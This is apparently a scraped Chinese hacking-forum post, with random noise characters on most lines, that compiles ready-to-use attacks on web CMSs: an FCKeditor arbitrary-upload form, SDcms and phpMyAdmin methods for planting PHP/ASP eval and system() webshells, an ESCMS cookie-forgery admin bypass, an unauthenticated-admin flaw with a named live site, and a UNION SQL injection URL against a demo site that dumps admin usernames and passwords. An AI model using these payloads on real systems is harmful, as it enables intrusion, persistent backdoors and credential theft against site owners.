9 Q( y1 O' ]% r: ~! _9 I如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
1 Y( N% t9 ~; W2 w<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">$ _! ?& Q. V7 p a% t/ W ~$ c+ t
Upload a new file:<br>
8 j8 E* D/ h- ]! V \<input type="file" name="NewFile" size="50"><br>7 V# Y% w' g' z0 [
<input id="btnUpload" type="submit" value="Upload">) K. A; g' {9 y$ A' T0 W
</form>/ I; z& o4 l) M2 d1 s( s. p
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 Z+ A8 g+ j& T+ F7 u6 A+ k% q
! y1 `6 T' ~9 ? W4 V& nSDcms 后台拿webshell* Y5 m# j* S. ?) z: \% o9 h
0 E- {8 D2 k- n
第一种方法:
* V5 B- n- b6 r$ P进入后台-->系统管理-->系统设置-->系统设置->网站名称;3 Y4 E' H5 @7 t; g8 D
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
6 K2 s& w) Z) e+ l用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
0 z" T0 R, y( ]6 E; s第二种方法:
2 t [7 x' E% ?9 I- s1 X进入后台-->系统管理-->系统设置-->系统设置->上传设置;7 Y# q1 ? p) y2 `3 d% m e9 d
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!- C& @4 h/ y& f& M" u
第三种方法:9 J$ s' J. }. d- _
进入后台-->界面管理-->模板文件管理-->创建文件% A; B; X y# }, \# j
文件名写入getshell.ashx6 d i2 K. e# E, L; G: J* z) {
内容写入下面内容:
. ^" o% c( }3 X9 E; ]/====================复制下面的=========================/; k/ j8 q0 T2 x& F( Y* Y( V
<%@ WebHandler Language="C#" Class="Handler" %>
2 @/ C5 z2 R' Z) f: y" l! Fusing System;5 `3 _1 t2 V# C' a9 _
using System.Web;! T& n3 U! [' D a: T
using System.IO;
# O. S+ H1 s# Y" D/ S( T# tpublic class Handler : IHttpHandler {
8 C) A" r( i: f& X( d' E' _public void ProcessRequest (HttpContext context) {
. R ^/ N! A5 k5 c% b1 f; y, Vcontext.Response.ContentType = "text/plain";9 Q( t' [/ d; E
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
: B8 H+ I2 s8 ]% Ofile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
' Q" T8 S( {" K0 d+ A0 |file1.Flush();
5 x1 Q8 ?% s. F( zfile1.Close();9 _5 ?- T& {8 u% a: U0 z& O
}0 v' L8 O2 {; K/ V
public bool IsReusable {
1 H1 Y# T6 R; i& o- d! j. ^get {) i- \) g2 F e/ `' x5 y' |
return false;
# S9 n+ U# Z+ m. r0 w/ v}8 `! u' v! l0 e: Q
}: i/ j- M- q( l0 ^ @5 k9 u
}
- S$ B# o6 s. u9 c/=============================================/
0 o; w- A: W, v访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx# o1 q! m& f2 }- r' j: ]
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
1 @, c: g0 a8 K+ q/ e# ^. ]-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 F4 r! q; p' ^& X. R9 S! u: j
# m/ _! w4 p" i7 _" y/ [1 PESCMS网站管理系统0day
# o) ?2 k& H/ w2 j. t- x& m; _, S& A5 m: \8 `: u
后台登陆验证是通过admin/check.asp实现的
* b7 @: w9 X) [5 w5 ~; O: n# ]3 u, ]% g1 f: i' @1 j' y
首先我们打开http://target.com/admin/es_index.html% T# }3 [: U7 T3 l+ g% }; G9 p3 G
然后在COOKIE结尾加上
+ S1 r2 m% R* I2 r; ESCMS$_SP2=ES_admin=st0p;1 O: [, y1 q: Q0 H" L2 w/ V
修改,然后刷新! U" ~7 H4 {& G- H3 s& W
进后台了嘎... _. @6 O- T3 r" x
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL! i J$ d" \1 s. Z1 C, [! T& c
, i% @- [' J- \) n3 T
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.. z: r' |" i+ m1 ^ R
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp; f$ S, r* ^3 g) b6 X# |7 O
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
1 H& X% Y5 E& C/ i9 P. P! m4 f8 r在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了# n+ x: |" ?6 C, }, f" Y. w- W7 x4 k
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, T# a% ~, Q% y* `( h8 D, x+ \/ A, w( |; y6 T" w& p
宁志网站管理系统后台无验证漏洞及修复7 G- c, }2 w2 L* o& O
% ^) ^: L! E# Q网上搜了一下,好像没有发布.如有雷同纯粹巧合!" s4 a. M: r! c8 s
官方网站:www.ningzhi.net
$ {" {8 e& w9 Y% L1 C学校网站管理系统 V.2011版本
& A( f1 A4 V. v- x6 i5 R$ J/ zhttp://down.chinaz.com/soft/29943.htm # ~9 H# T$ V& Y3 A( {0 J
其它版本(如:政府版等),自行下载.+ ^" W4 {# y) F* z b
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
* v: ~/ l* D- ]4 Vlogin.asp代码如下:: M- p& G' y/ V
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
8 A1 J0 a4 x! H% T- M" wmanage.asp代码我就不帖出来了.反正也没验证.' b* V, T2 U3 Z: p* l, c
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. j% X( [% _( X3 D8 G. a8 f& O漏洞利用:
1 n0 D% X+ E! e2 I/ r0 ]+ M直接访问http://www.0855.tv/admin/manage.asp; t: R' c/ W9 J: C8 L2 n
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5, G' s+ Q3 x# [
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- y9 v# f* o q( Z4 s5 O3 @* t. o( j8 T8 ?
phpmyadmin拿shell的四种方法总结及修复
5 c) q/ r v7 f* q8 _
/ H1 {: `! g6 D& S/ F3 ?方法一:" N, H! [( @3 n( t+ k
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );/ r; _& B; X- b; w
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');! Q/ L' l+ M4 V0 D) o7 X1 c9 o, o
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
- L7 E& l# e! L2 {8 q" G----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
" Q6 v/ r' y/ S) b 一句话连接密码:7on4 V5 t/ |% B, ~
方法二:
, u- e8 \6 y7 b0 S读取文件内容: select load_file('E:/xamp/www/s.php');
5 _ C( G2 M% g& P3 L写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php': r; E' l& I% A( F" P" Q
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
6 l: C% T" b5 t9 L- n o9 X方法三:7 J3 p8 c" K9 Q7 |) g
JhackJ版本 PHPmyadmin拿shell! d- M ~$ [( v+ p( G0 s
Create TABLE study (cmd text NOT NULL);1 r/ R* A& s2 {6 R+ Y1 L3 K
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
, a" ]% _& B, |select cmd from study into outfile 'E:/wamp/www/7.php';
' \/ }8 n4 U4 ~* N1 X, ADrop TABLE IF EXISTS study;
. E k `8 U1 G! ~1 {# d<?php eval($_POST[cmd])?>
$ b' s& x- x, n0 w! `! pCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
! x \' o- i# x) aINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
0 F4 Z3 H/ {" M! _; ySELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
2 `2 z2 t9 R: ]2 p' q; IDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
% J5 F$ ]0 G3 _' l5 x2 R3 y2 X方法四:
/ j9 H& _: i$ i& [- q, Hselect load_file('E:/xamp/www/study.php');
- k3 C" M4 N; I7 K' h7 D( E: Rselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'% i4 w- M1 x# ]8 t) e1 }+ c
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir" q/ X4 B+ U& N, F% H
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
( G h# o9 j4 u. @. f, I9 w! d% m7 Z) E/ O! T7 G Y
NO.001中学网站管理系统 Build 110628 注入漏洞9 L9 F( k6 M; i8 e# H6 w4 J
/ Z* b$ M& Y3 x9 GNO.001中学网站管理系统功能模块:
; X; d- ~6 V- s h- Q1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等/ f& B. E- a3 G$ ^. T
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
) Q( V% z' s/ P) p3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
1 M5 U& r$ ?( a3 T4.视频图片管理:一级分类,动态添加视频或者图片等信息6 N! R( Y" o0 g- h/ n
5.留言管理:对留言,修改,删除、回复等管理9 n( h5 n' |7 b: \9 T; v
6.校友频道:包括校友资料excel导出、管理等功能
0 `8 c* F& i$ E: p7 H; ]7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
, n2 u3 ~- ]" X0 K默认后台:admin/login.asp0 g6 |$ Y. {# l, M, K
官方演示:http://demo.001cms.net7 Z& i# N& _, u) d6 G, \
源码下载地址:http://down.chinaz.com/soft/30187.htm
Z( K% D% e7 G) d" \$ ?7 R7 A. ~EXP:
& u+ ]9 J5 X" ]" W) d( j/ ?% ~1 Yunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
7 j% W9 I4 B) r, f: V: m/ s测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin" W- a# N6 |$ T. w7 t- a! z
getshell:后台有备份,你懂的
4 T* ?! I) |% B9 M/ }另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
& _4 h& T* X) [: M: S------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
匿名
发表于 2017-10-28 08:21:04
发表于 2012-9-13 16:58:38
收藏
支持
反对